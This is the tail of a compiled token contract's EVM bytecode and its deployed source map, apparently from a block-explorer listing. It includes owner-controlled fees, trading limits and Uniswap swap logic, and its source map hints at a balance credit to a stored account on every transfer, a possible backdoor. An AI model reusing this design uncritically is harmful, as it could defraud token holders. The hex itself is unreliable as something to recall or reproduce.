6006546001600160a01b03861660009081526013602052604090205460ff600160a01b90920482161591168061167a57506001600160a01b03851660009081526013602052604090205460ff165b15611683575060005b60008060008315611825577f000000000000000000000000fceb7b2c5ccfcb242b9e9c38f40e6aefbdf358ae6001600160a01b0316886001600160a01b03161480156116d157506000600f54115b15611737576116f660646116f0600f548a611a3c90919063ffffffff16565b90611a48565b9250600f54601154846117099190611ed5565b6117139190611ef4565b9150600f54601054846117269190611ed5565b6117309190611ef4565b90506117d6565b7f000000000000000000000000fceb7b2c5ccfcb242b9e9c38f40e6aefbdf358ae6001600160a01b0316896001600160a01b031614801561177a57506000600c54115b156117d65761179960646116f0600c548a611a3c90919063ffffffff16565b9250600c54600e54846117ac9190611ed5565b6117b69190611ef4565b9150600c54600d54846117c99190611ed5565b6117d39190611ef4565b90505b82156117e7576117e78930856118a0565b811561181857611818307f000000000000000000000000fceb7b2c5ccfcb242b9e9c38f40e6aefbdf358ae846118a0565b6118228388611f9e565b96505b6118308989896118a0565b505050505050505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b60006118998284611e82565b9392505050565b6001600160a01b0383166118c65760405162461bcd60e51b815260040161085a90611f16565b6001600160a01b0382166118ec5760405162461bcd60e51b815260040161085a90611f5b565b6001600160a01b038316600090815260208190526040902054818110156119645760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161085a565b6001600160a01b0380851660009081526020819052604080822085850390559185168152908120805484929061199b908490611e82565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516119e791815260200190565b60405180910390a350505050565b3060009081526020819052604090205480611a0d5750565b600954611a1b906014611ed5565b811115611a3357600954611a30906014611ed5565b90505b61107c81611a54565b60006118998284611ed5565b60006118998284611ef4565b6040805160028082526060820183526000926020830190803683370190505090503081600081518110611a8957611a89611fb5565b6001600160a01b039283166020918202929092010152600654825191169082906001908110611aba57611aba611fb5565b60200260200101906001600160a01b031690816001600160a01b031681525050611b05307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d8461107f565b600754604051635c11d79560e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d811692635c11d79592611b61928792600092889291909116904290600401611fcb565b600060405180830381600087803b158015611b7b57600080fd5b505af1158015611b8f573d6000803e3d6000fd5b505050505050565b600060208284031215611ba957600080fd5b5035919050565b60008060408385031215611bc357600080fd5b50508035926020909101359150565b600060208083528351808285015260005b81811015611bff57858101830151858201604001528201611be3565b81811115611c11576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610fdf57600080fd5b60008060408385031215611c5157600080fd5b611c5a83611c27565b946020939093013593505050565b600060208284031215611c7a57600080fd5b61189982611c27565b600080600060608486031215611c9857600080fd5b611ca184611c27565b9250611caf60208501611c27565b9150604084013590509250925092565b80358015158114610fdf57600080fd5b60008060408385031215611ce257600080fd5b611ceb83611c27565b9150611cf960208401611cbf565b90509250929050565b600060208284031215611d1457600080fd5b61189982611cbf565b60008060408385031215611d3057600080fd5b611d3983611c27565b9150611cf960208401611c27565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115611d98578160001904821115611d7e57611d7e611d47565b80851615611d8b57918102915b93841c9390800290611d62565b509250929050565b600082611daf575060016109b1565b81611dbc575060006109b1565b8160018114611dd25760028114611ddc57611df8565b60019150506109b1565b60ff841115611ded57611ded611d47565b50506001821b6109b1565b5060208310610133831016604e8410600b8410161715611e1b575081810a6109b1565b611e258383611d5d565b8060001904821115611e3957611e39611d47565b029392505050565b60006118998383611da0565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60008219821115611e9557611e95611d47565b500190565b600181811c90821680611eae57607f821691505b60208210811415611ecf57634e487b7160e01b600052602260045260246000fd5b50919050565b6000816000190483118215151615611eef57611eef611d47565b500290565b600082611f1157634e487b7160e01b600052601260045260246000fd5b500490565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b600082821015611fb057611fb0611d47565b500390565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b8181101561201b5784516001600160a01b031683529383019391830191600101611ff6565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220a6c1f487d0115b3f404f51ddb3de549b6c4a9ed6fe0543355c36e1d197818d1664736f6c634300080a0033
Deployed Bytecode Sourcemap
24711:10870:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;28252:171;;;;;;;;;;-1:-1:-1;28252:171:0;;;;;:::i;:::-;;:::i;:::-;;30229:318;;;;;;;;;;-1:-1:-1;30229:318:0;;;;;:::i;:::-;;:::i;9567:100::-;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11734:169;;;;;;;;;;-1:-1:-1;11734:169:0;;;;;:::i;:::-;;:::i;:::-;;;1656:14:1;;1649:22;1631:41;;1619:2;1604:18;11734:169:0;1491:187:1;25702:63:0;;;;;;;;;;-1:-1:-1;25702:63:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;24782:51;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;2064:32:1;;;2046:51;;2034:2;2019:18;24782:51:0;1874:229:1;10687:108:0;;;;;;;;;;-1:-1:-1;10775:12:0;;10687:108;;;2254:25:1;;;2242:2;2227:18;10687:108:0;2108:177:1;28998:272:0;;;;;;;;;;-1:-1:-1;28998:272:0;;;;;:::i;:::-;;:::i;12385:492::-;;;;;;;;;;-1:-1:-1;12385:492:0;;;;;:::i;:::-;;:::i;24885:53::-;;;;;;;;;;;;24931:6;24885:53;;10529:93;;;;;;;;;;-1:-1:-1;10529:93:0;;10612:2;2973:36:1;;2961:2;2946:18;10529:93:0;2831:184:1;24840:38:0;;;;;;;;;;;;;;;25196:33;;;;;;;;;;-1:-1:-1;25196:33:0;;;;;;;;30745:126;;;;;;;;;;-1:-1:-1;30745:126:0;;;;;:::i;:::-;-1:-1:-1;;;;;30835:28:0;30811:4;30835:28;;;:19;:28;;;;;;;;;30745:126;29910:311;;;;;;;;;;-1:-1:-1;29910:311:0;;;;;:::i;:::-;;:::i;25420:28::-;;;;;;;;;;;;;;;;25276:31;;;;;;;;;;-1:-1:-1;25276:31:0;;;;;;;;;;;8845:44;;;;;;;;;;-1:-1:-1;8845:44:0;;;;;:::i;:::-;;;;;;;;;;;;;;;10858:127;;;;;;;;;;-1:-1:-1;10858:127:0;;;;;:::i;:::-;-1:-1:-1;;;;;10959:18:0;10932:7;10959:18;;;;;;;;;;;;10858:127;2803:103;;;;;;;;;;;;;:::i;28123:121::-;;;;;;;;;;;;;:::i;29539:167::-;;;;;;;;;;-1:-1:-1;29539:167:0;;;;;:::i;:::-;;:::i;27959:112::-;;;;;;;;;;;;;:::i;2152:87::-;;;;;;;;;;-1:-1:-1;2225:6:0;;-1:-1:-1;;;;;2225:6:0;2152:87;;25048:24;;;;;;;;;;-1:-1:-1;25048:24:0;;;;-1:-1:-1;;;;;25048:24:0;;;29802:100;;;;;;;;;;-1:-1:-1;29802:100:0;;;;;:::i;:::-;;:::i;9786:104::-;;;;;;;;;;;;;:::i;25350:24::-;;;;;;;;;;;;;;;;25455:25;;;;;;;;;;;;;;;;11198:175;;;;;;;;;;-1:-1:-1;11198:175:0;;;;;:::i;:::-;;:::i;24945:64::-;;;;;;;;;;-1:-1:-1;24945:64:0;;;;-1:-1:-1;;;;;24945:64:0;;;25236:33;;;;;;;;;;-1:-1:-1;25236:33:0;;;;;;;;;;;30555:182;;;;;;;;;;-1:-1:-1;30555:182:0;;;;;:::i;:::-;;:::i;29278:253::-;;;;;;;;;;-1:-1:-1;29278:253:0;;;;;:::i;:::-;;:::i;25081:35::-;;;;;;;;;;;;;;;;28493:497;;;;;;;;;;-1:-1:-1;28493:497:0;;;;;:::i;:::-;;:::i;25525:26::-;;;;;;;;;;;;;;;;25316:27;;;;;;;;;;;;;;;;11436:151;;;;;;;;;;-1:-1:-1;11436:151:0;;;;;:::i;:::-;-1:-1:-1;;;;;11552:18:0;;;11525:7;11552:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11436:151;25123:33;;;;;;;;;;;;;;;;25381:30;;;;;;;;;;;;;;;;3061:201;;;;;;;;;;-1:-1:-1;3061:201:0;;;;;:::i;:::-;;:::i;25487:31::-;;;;;;;;;;;;;;;;25163:24;;;;;;;;;;;;;;;;28252:171;28344:11;;28331:9;:24;28322:51;;;;-1:-1:-1;;;28322:51:0;;4096:2:1;28322:51:0;;;4078:21:1;4135:2;4115:18;;;4108:30;-1:-1:-1;;;4154:18:1;;;4147:43;4207:18;;28322:51:0;;;;;;;;;28404:11;;28398:17;;:2;:17;:::i;:::-;28384:11;:31;-1:-1:-1;28252:171:0:o;30229:318::-;2225:6;;-1:-1:-1;;;;;2225:6:0;905:10;2372:23;2364:68;;;;-1:-1:-1;;;2364:68:0;;;;;;;:::i;:::-;30348:10:::1;:20:::0;;;30379:16:::1;:32:::0;;;30438:29:::1;30398:13:::0;30361:7;30438:29:::1;:::i;:::-;30422:13;:45:::0;;;30503:2:::1;-1:-1:-1::0;30486:19:0::1;30478:61;;;::::0;-1:-1:-1;;;30478:61:0;;6438:2:1;30478:61:0::1;::::0;::::1;6420:21:1::0;6477:2;6457:18;;;6450:30;6516:31;6496:18;;;6489:59;6565:18;;30478:61:0::1;6236:353:1::0;30478:61:0::1;30229:318:::0;;:::o;9567:100::-;9621:13;9654:5;9647:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9567:100;:::o;11734:169::-;11817:4;11834:39;905:10;11857:7;11866:6;11834:8;:39::i;:::-;-1:-1:-1;11891:4:0;11734:169;;;;;:::o;28998:272::-;2225:6;;-1:-1:-1;;;;;2225:6:0;905:10;2372:23;2364:68;;;;-1:-1:-1;;;2364:68:0;;;;;;;:::i;:::-;29134:4:::1;29127:3;29106:13;10775:12:::0;;;10687:108;29106:13:::1;:17;::::0;29122:1:::1;29106:17;:::i;:::-;29105:25;;;;:::i;:::-;29104:34;;;;:::i;:::-;29094:6;:44;;29072:139;;;::::0;-1:-1:-1;;;29072:139:0;;7576:2:1;29072:139:0::1;::::0;::::1;7558:21:1::0;7615:2;7595:18;;;7588:30;7654:34;7634:18;;;7627:62;-1:-1:-1;;;7705:18:1;;;7698:43;7758:19;;29072:139:0::1;7374:409:1::0;29072:139:0::1;29245:17;:6:::0;29255::::1;29245:17;:::i;:::-;29222:20;:40:::0;-1:-1:-1;28998:272:0:o;12385:492::-;12525:4;12542:36;12552:6;12560:9;12571:6;12542:9;:36::i;:::-;-1:-1:-1;;;;;12618:19:0;;12591:24;12618:19;;;:11;:19;;;;;;;;905:10;12618:33;;;;;;;;12670:26;;;;12662:79;;;;-1:-1:-1;;;12662:79:0;;7990:2:1;12662:79:0;;;7972:21:1;8029:2;8009:18;;;8002:30;8068:34;8048:18;;;8041:62;-1:-1:-1;;;8119:18:1;;;8112:38;8167:19;;12662:79:0;7788:404:1;12662:79:0;12777:57;12786:6;905:10;12827:6;12808:16;:25;12777:8;:57::i;:::-;-1:-1:-1;12865:4:0;;12385:492;-1:-1:-1;;;;12385:492:0:o;29910:311::-;2225:6;;-1:-1:-1;;;;;2225:6:0;905:10;2372:23;2364:68;;;;-1:-1:-1;;;2364:68:0;;;;;;;:::i;:::-;30028:9:::1;:19:::0;;;30058:15:::1;:31:::0;;;30115:27:::1;30076:13:::0;30040:7;30115:27:::1;:::i;:::-;30100:12;:42:::0;;;30177:2:::1;-1:-1:-1::0;30161:18:0::1;30153:60;;;::::0;-1:-1:-1;;;30153:60:0;;6438:2:1;30153:60:0::1;::::0;::::1;6420:21:1::0;6477:2;6457:18;;;6450:30;6516:31;6496:18;;;6489:59;6565:18;;30153:60:0::1;6236:353:1::0;2803:103:0;2225:6;;-1:-1:-1;;;;;2225:6:0;905:10;2372:23;2364:68;;;;-1:-1:-1;;;2364:68:0;;;;;;;:::i;:::-;2868:30:::1;2895:1;2868:18;:30::i;:::-;2803:103::o:0;28123:121::-;2225:6;;28175:4;;-1:-1:-1;;;;;2225:6:0;905:10;2372:23;2364:68;;;;-1:-1:-1;;;2364:68:0;;;;;;;:::i;:::-;-1:-1:-1;28192:14:0::1;:22:::0;;-1:-1:-1;;28192:22:0::1;::::0;;;28123:121;:::o;29539:167::-;2225:6;;-1:-1:-1;;;;;2225:6:0;905:10;2372:23;2364:68;;;;-1:-1:-1;;;2364:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;29652:39:0;;;::::1;;::::0;;;:31:::1;:39;::::0;;;;:46;;-1:-1:-1;;29652:46:0::1;::::0;::::1;;::::0;;;::::1;::::0;;29539:167::o;27959:112::-;2225:6;;-1:-1:-1;;;;;2225:6:0;905:10;2372:23;2364:68;;;;-1:-1:-1;;;2364:68:0;;;;;;;:::i;:::-;28014:13:::1;:20:::0;;-1:-1:-1;;28045:18:0;;;;;27959:112::o;29802:100::-;2225:6;;-1:-1:-1;;;;;2225:6:0;905:10;2372:23;2364:68;;;;-1:-1:-1;;;2364:68:0;;;;;;;:::i;:::-;29873:11:::1;:21:::0;;;::::1;;::::0;::::1;-1:-1:-1::0;;29873:21:0;;::::1;::::0;;;::::1;::::0;;29802:100::o;9786:104::-;9842:13;9875:7;9868:14;;;;;:::i;11198:175::-;11284:4;11301:42;905:10;11325:9;11336:6;11301:9;:42::i;30555:182::-;2225:6;;-1:-1:-1;;;;;2225:6:0;905:10;2372:23;2364:68;;;;-1:-1:-1;;;2364:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;30640:28:0;::::1;;::::0;;;:19:::1;:28;::::0;;;;;;;;:39;;-1:-1:-1;;30640:39:0::1;::::0;::::1;;::::0;;::::1;::::0;;;30695:34;;1631:41:1;;;30695:34:0::1;::::0;1604:18:1;30695:34:0::1;;;;;;;30555:182:::0;;:::o;29278:253::-;2225:6;;-1:-1:-1;;;;;2225:6:0;905:10;2372:23;2364:68;;;;-1:-1:-1;;;2364:68:0;;;;;;;:::i;:::-;29417:4:::1;29410:3;29389:13;10775:12:::0;;;10687:108;29389:13:::1;:17;::::0;29405:1:::1;29389:17;:::i;:::-;29388:25;;;;:::i;:::-;29387:34;;;;:::i;:::-;29377:6;:44;;29355:128;;;::::0;-1:-1:-1;;;29355:128:0;;8399:2:1;29355:128:0::1;::::0;::::1;8381:21:1::0;8438:2;8418:18;;;8411:30;8477:34;8457:18;;;8450:62;-1:-1:-1;;;8528:18:1;;;8521:32;8570:19;;29355:128:0::1;8197:398:1::0;29355:128:0::1;29506:17;:6:::0;29516::::1;29506:17;:::i;:::-;29494:9;:29:::0;-1:-1:-1;29278:253:0:o;28493:497::-;2225:6;;28601:4;;-1:-1:-1;;;;;2225:6:0;905:10;2372:23;2364:68;;;;-1:-1:-1;;;2364:68:0;;;;;;;:::i;:::-;28680:6:::1;28659:13;10775:12:::0;;;10687:108;28659:13:::1;:17;::::0;28675:1:::1;28659:17;:::i;:::-;28658:28;;;;:::i;:::-;28645:9;:41;;28623:144;;;::::0;-1:-1:-1;;;28623:144:0;;8802:2:1;28623:144:0::1;::::0;::::1;8784:21:1::0;8841:2;8821:18;;;8814:30;8880:34;8860:18;;;8853:62;-1:-1:-1;;;8931:18:1;;;8924:51;8992:19;;28623:144:0::1;8600:417:1::0;28623:144:0::1;28835:4;28814:13;10775:12:::0;;;10687:108;28814:13:::1;:17;::::0;28830:1:::1;28814:17;:::i;:::-;28813:26;;;;:::i;:::-;28800:9;:39;;28778:141;;;::::0;-1:-1:-1;;;28778:141:0;;9224:2:1;28778:141:0::1;::::0;::::1;9206:21:1::0;9263:2;9243:18;;;9236:30;9302:34;9282:18;;;9275:62;-1:-1:-1;;;9353:18:1;;;9346:50;9413:19;;28778:141:0::1;9022:416:1::0;28778:141:0::1;-1:-1:-1::0;28930:18:0::1;:30:::0;;;28978:4:::1;2443:1;28493:497:::0;;;:::o;3061:201::-;2225:6;;-1:-1:-1;;;;;2225:6:0;905:10;2372:23;2364:68;;;;-1:-1:-1;;;2364:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;3150:22:0;::::1;3142:73;;;::::0;-1:-1:-1;;;3142:73:0;;9645:2:1;3142:73:0::1;::::0;::::1;9627:21:1::0;9684:2;9664:18;;;9657:30;9723:34;9703:18;;;9696:62;-1:-1:-1;;;9774:18:1;;;9767:36;9820:19;;3142:73:0::1;9443:402:1::0;3142:73:0::1;3226:28;3245:8;3226:18;:28::i;:::-;3061:201:::0;:::o;15226:380::-;-1:-1:-1;;;;;15362:19:0;;15354:68;;;;-1:-1:-1;;;15354:68:0;;10052:2:1;15354:68:0;;;10034:21:1;10091:2;10071:18;;;10064:30;10130:34;10110:18;;;10103:62;-1:-1:-1;;;10181:18:1;;;10174:34;10225:19;;15354:68:0;9850:400:1;15354:68:0;-1:-1:-1;;;;;15441:21:0;;15433:68;;;;-1:-1:-1;;;15433:68:0;;10457:2:1;15433:68:0;;;10439:21:1;10496:2;10476:18;;;10469:30;10535:34;10515:18;;;10508:62;-1:-1:-1;;;10586:18:1;;;10579:32;10628:19;;15433:68:0;10255:398:1;15433:68:0;-1:-1:-1;;;;;15514:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;15566:32;;2254:25:1;;;15566:32:0;;2227:18:1;15566:32:0;;;;;;;15226:380;;;:::o;30879:3769::-;-1:-1:-1;;;;;31011:18:0;;31003:68;;;;-1:-1:-1;;;31003:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;31090:16:0;;31082:64;;;;-1:-1:-1;;;31082:64:0;;;;;;;:::i;:::-;31220:11;;31180:52;;31205:12;31214:3;31205:6;:12;:::i;:::-;:26;;;;:::i;:::-;31190:9;;-1:-1:-1;;;;;31190:9:0;31180;:20;;;;;;;;;;;;:24;:52::i;:::-;31167:9;;-1:-1:-1;;;;;31167:9:0;31157;:20;;;;;;;;;;:75;31253:11;31249:93;;31281:28;31297:4;31303:2;31307:1;31281:15;:28::i;:::-;30879:3769;;;:::o;31249:93::-;31358:14;;;;31354:1430;;;2225:6;;-1:-1:-1;;;;;31411:15:0;;;2225:6;;31411:15;;;;:49;;-1:-1:-1;2225:6:0;;-1:-1:-1;;;;;31447:13:0;;;2225:6;;31447:13;;31411:49;:86;;;;-1:-1:-1;;;;;;31481:16:0;;;;31411:86;:128;;;;-1:-1:-1;;;;;;31518:21:0;;31532:6;31518:21;;31411:128;:158;;;;-1:-1:-1;31561:8:0;;-1:-1:-1;;;31561:8:0;;;;31560:9;31411:158;31389:1384;;;31609:13;;;;;;;31604:223;;-1:-1:-1;;;;;31681:25:0;;;;;;:19;:25;;;;;;;;;:52;;-1:-1:-1;;;;;;31710:23:0;;;;;;:19;:23;;;;;;;;31681:52;31647:160;;;;-1:-1:-1;;;31647:160:0;;11670:2:1;31647:160:0;;;11652:21:1;11709:2;11689:18;;;11682:30;-1:-1:-1;;;11728:18:1;;;11721:52;11790:18;;31647:160:0;11468:346:1;31647:160:0;32041:13;-1:-1:-1;;;;;32033:21:0;:4;-1:-1:-1;;;;;32033:21:0;;:82;;;;-1:-1:-1;;;;;;32080:35:0;;;;;;:31;:35;;;;;;;;32079:36;32033:82;32007:751;;;32202:20;;32192:6;:30;;32158:169;;;;-1:-1:-1;;;32158:169:0;;12021:2:1;32158:169:0;;;12003:21:1;12060:2;12040:18;;;12033:30;12099:34;12079:18;;;12072:62;-1:-1:-1;;;12150:18:1;;;12143:51;12211:19;;32158:169:0;11819:417:1;32158:169:0;32410:9;;-1:-1:-1;;;;;10959:18:0;;10932:7;10959:18;;;;;;;;;;;32384:22;;:6;:22;:::i;:::-;:35;;32350:140;;;;-1:-1:-1;;;32350:140:0;;12443:2:1;32350:140:0;;;12425:21:1;12482:2;12462:18;;;12455:30;-1:-1:-1;;;12501:18:1;;;12494:49;12560:18;;32350:140:0;12241:343:1;32350:140:0;32007:751;;;-1:-1:-1;;;;;32538:35:0;;;;;;:31;:35;;;;;;;;32533:225;;32658:9;;-1:-1:-1;;;;;10959:18:0;;10932:7;10959:18;;;;;;;;;;;32632:22;;:6;:22;:::i;:::-;:35;;32598:140;;;;-1:-1:-1;;;32598:140:0;;12443:2:1;32598:140:0;;;12425:21:1;12482:2;12462:18;;;12455:30;-1:-1:-1;;;12501:18:1;;;12494:49;12560:18;;32598:140:0;12241:343:1;32598:140:0;32845:4;32796:28;10959:18;;;;;;;;;;;32903;;32879:42;;;;;;;32952:35;;-1:-1:-1;32976:11:0;;;;;;;32952:35;:61;;;;-1:-1:-1;33005:8:0;;-1:-1:-1;;;33005:8:0;;;;33004:9;32952:61;:97;;;;;33036:13;-1:-1:-1;;;;;33030:19:0;:2;-1:-1:-1;;;;;33030:19:0;;32952:97;:140;;;;-1:-1:-1;;;;;;33067:25:0;;;;;;:19;:25;;;;;;;;33066:26;32952:140;:181;;;;-1:-1:-1;;;;;;33110:23:0;;;;;;:19;:23;;;;;;;;33109:24;32952:181;32934:313;;;33160:8;:15;;-1:-1:-1;;;;33160:15:0;-1:-1:-1;;;33160:15:0;;;33192:10;:8;:10::i;:::-;33219:8;:16;;-1:-1:-1;;;;33219:16:0;;;32934:313;33275:8;;-1:-1:-1;;;;;33385:25:0;;33259:12;33385:25;;;:19;:25;;;;;;33275:8;-1:-1:-1;;;33275:8:0;;;;;33274:9;;33385:25;;:52;;-1:-1:-1;;;;;;33414:23:0;;;;;;:19;:23;;;;;;;;33385:52;33381:100;;;-1:-1:-1;33464:5:0;33381:100;33493:12;33520:26;33561:20;33674:7;33670:925;;;33732:13;-1:-1:-1;;;;;33726:19:0;:2;-1:-1:-1;;;;;33726:19:0;;:40;;;;;33765:1;33749:13;;:17;33726:40;33722:583;;;33794:34;33824:3;33794:25;33805:13;;33794:6;:10;;:25;;;;:::i;:::-;:29;;:34::i;:::-;33787:41;;33896:13;;33876:16;;33869:4;:23;;;;:::i;:::-;33868:41;;;;:::i;:::-;33847:62;;33965:13;;33951:10;;33944:4;:17;;;;:::i;:::-;33943:35;;;;:::i;:::-;33928:50;;33722:583;;;34048:13;-1:-1:-1;;;;;34040:21:0;:4;-1:-1:-1;;;;;34040:21:0;;:41;;;;;34080:1;34065:12;;:16;34040:41;34036:269;;;34109:33;34138:3;34109:24;34120:12;;34109:6;:10;;:24;;;;:::i;:33::-;34102:40;;34209:12;;34190:15;;34183:4;:22;;;;:::i;:::-;34182:39;;;;:::i;:::-;34161:60;;34277:12;;34264:9;;34257:4;:16;;;;:::i;:::-;34256:33;;;;:::i;:::-;34241:48;;34036:269;34325:7;;34321:90;;34353:42;34369:4;34383;34390;34353:15;:42::i;:::-;34429:22;;34425:128;;34472:65;34496:4;34503:13;34518:18;34472:15;:65::i;:::-;34569:14;34579:4;34569:14;;:::i;:::-;;;33670:925;34607:33;34623:4;34629:2;34633:6;34607:15;:33::i;:::-;30992:3656;;;;;;30879:3769;;;:::o;3422:191::-;3515:6;;;-1:-1:-1;;;;;3532:17:0;;;-1:-1:-1;;;;;;3532:17:0;;;;;;;3565:40;;3515:6;;;3532:17;3515:6;;3565:40;;3496:16;;3565:40;3485:128;3422:191;:::o;19941:98::-;19999:7;20026:5;20030:1;20026;:5;:::i;:::-;20019:12;19941:98;-1:-1:-1;;;19941:98:0:o;13367:733::-;-1:-1:-1;;;;;13507:20:0;;13499:70;;;;-1:-1:-1;;;13499:70:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;13588:23:0;;13580:71;;;;-1:-1:-1;;;13580:71:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;13748:17:0;;13724:21;13748:17;;;;;;;;;;;13784:23;;;;13776:74;;;;-1:-1:-1;;;13776:74:0;;12921:2:1;13776:74:0;;;12903:21:1;12960:2;12940:18;;;12933:30;12999:34;12979:18;;;12972:62;-1:-1:-1;;;13050:18:1;;;13043:36;13096:19;;13776:74:0;12719:402:1;13776:74:0;-1:-1:-1;;;;;13886:17:0;;;:9;:17;;;;;;;;;;;13906:22;;;13886:42;;13950:20;;;;;;;;:30;;13922:6;;13886:9;13950:30;;13922:6;;13950:30;:::i;:::-;;;;;;;;14015:9;-1:-1:-1;;;;;13998:35:0;14007:6;-1:-1:-1;;;;;13998:35:0;;14026:6;13998:35;;;;2254:25:1;;2242:2;2227:18;;2108:177;13998:35:0;;;;;;;;13488:612;13367:733;;;:::o;35236:340::-;35319:4;35275:23;10959:18;;;;;;;;;;;;35336:59;;35377:7;35236:340::o;35336:59::-;35429:18;;:23;;35450:2;35429:23;:::i;:::-;35411:15;:41;35407:115;;;35487:18;;:23;;35508:2;35487:23;:::i;:::-;35469:41;;35407:115;35534:34;35552:15;35534:17;:34::i;20679:98::-;20737:7;20764:5;20768:1;20764;:5;:::i;21078:98::-;21136:7;21163:5;21167:1;21163;:5;:::i;34656:572::-;34807:16;;;34821:1;34807:16;;;;;;;;34783:21;;34807:16;;;;;;;;;;-1:-1:-1;34807:16:0;34783:40;;34852:4;34834;34839:1;34834:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;34834:23:0;;;:7;;;;;;;;;:23;34878:4;;34868:7;;34878:4;;;34868;;34878;;34868:7;;;;;;:::i;:::-;;;;;;:14;-1:-1:-1;;;;;34868:14:0;;;-1:-1:-1;;;;;34868:14:0;;;;;34895:62;34912:4;34927:15;34945:11;34895:8;:62::i;:::-;35170:9;;34996:224;;-1:-1:-1;;;34996:224:0;;-1:-1:-1;;;;;34996:15:0;:69;;;;;:224;;35080:11;;35106:1;;35151:4;;35170:9;;;;;35194:15;;34996:224;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34712:516;34656:572;:::o;14:180:1:-;73:6;126:2;114:9;105:7;101:23;97:32;94:52;;;142:1;139;132:12;94:52;-1:-1:-1;165:23:1;;14:180;-1:-1:-1;14:180:1:o;199:248::-;267:6;275;328:2;316:9;307:7;303:23;299:32;296:52;;;344:1;341;334:12;296:52;-1:-1:-1;;367:23:1;;;437:2;422:18;;;409:32;;-1:-1:-1;199:248:1:o;452:597::-;564:4;593:2;622;611:9;604:21;654:6;648:13;697:6;692:2;681:9;677:18;670:34;722:1;732:140;746:6;743:1;740:13;732:140;;;841:14;;;837:23;;831:30;807:17;;;826:2;803:26;796:66;761:10;;732:140;;;890:6;887:1;884:13;881:91;;;960:1;955:2;946:6;935:9;931:22;927:31;920:42;881:91;-1:-1:-1;1033:2:1;1012:15;-1:-1:-1;;1008:29:1;993:45;;;;1040:2;989:54;;452:597;-1:-1:-1;;;452:597:1:o;1054:173::-;1122:20;;-1:-1:-1;;;;;1171:31:1;;1161:42;;1151:70;;1217:1;1214;1207:12;1232:254;1300:6;1308;1361:2;1349:9;1340:7;1336:23;1332:32;1329:52;;;1377:1;1374;1367:12;1329:52;1400:29;1419:9;1400:29;:::i;:::-;1390:39;1476:2;1461:18;;;;1448:32;;-1:-1:-1;;;1232:254:1:o;1683:186::-;1742:6;1795:2;1783:9;1774:7;1770:23;1766:32;1763:52;;;1811:1;1808;1801:12;1763:52;1834:29;1853:9;1834:29;:::i;2290:328::-;2367:6;2375;2383;2436:2;2424:9;2415:7;2411:23;2407:32;2404:52;;;2452:1;2449;2442:12;2404:52;2475:29;2494:9;2475:29;:::i;:::-;2465:39;;2523:38;2557:2;2546:9;2542:18;2523:38;:::i;:::-;2513:48;;2608:2;2597:9;2593:18;2580:32;2570:42;;2290:328;;;;;:::o;3020:160::-;3085:20;;3141:13;;3134:21;3124:32;;3114:60;;3170:1;3167;3160:12;3185:254;3250:6;3258;3311:2;3299:9;3290:7;3286:23;3282:32;3279:52;;;3327:1;3324;3317:12;3279:52;3350:29;3369:9;3350:29;:::i;:::-;3340:39;;3398:35;3429:2;3418:9;3414:18;3398:35;:::i;:::-;3388:45;;3185:254;;;;;:::o;3444:180::-;3500:6;3553:2;3541:9;3532:7;3528:23;3524:32;3521:52;;;3569:1;3566;3559:12;3521:52;3592:26;3608:9;3592:26;:::i;3629:260::-;3697:6;3705;3758:2;3746:9;3737:7;3733:23;3729:32;3726:52;;;3774:1;3771;3764:12;3726:52;3797:29;3816:9;3797:29;:::i;:::-;3787:39;;3845:38;3879:2;3868:9;3864:18;3845:38;:::i;4236:127::-;4297:10;4292:3;4288:20;4285:1;4278:31;4328:4;4325:1;4318:15;4352:4;4349:1;4342:15;4368:422;4457:1;4500:5;4457:1;4514:270;4535:7;4525:8;4522:21;4514:270;;;4594:4;4590:1;4586:6;4582:17;4576:4;4573:27;4570:53;;;4603:18;;:::i;:::-;4653:7;4643:8;4639:22;4636:55;;;4673:16;;;;4636:55;4752:22;;;;4712:15;;;;4514:270;;;4518:3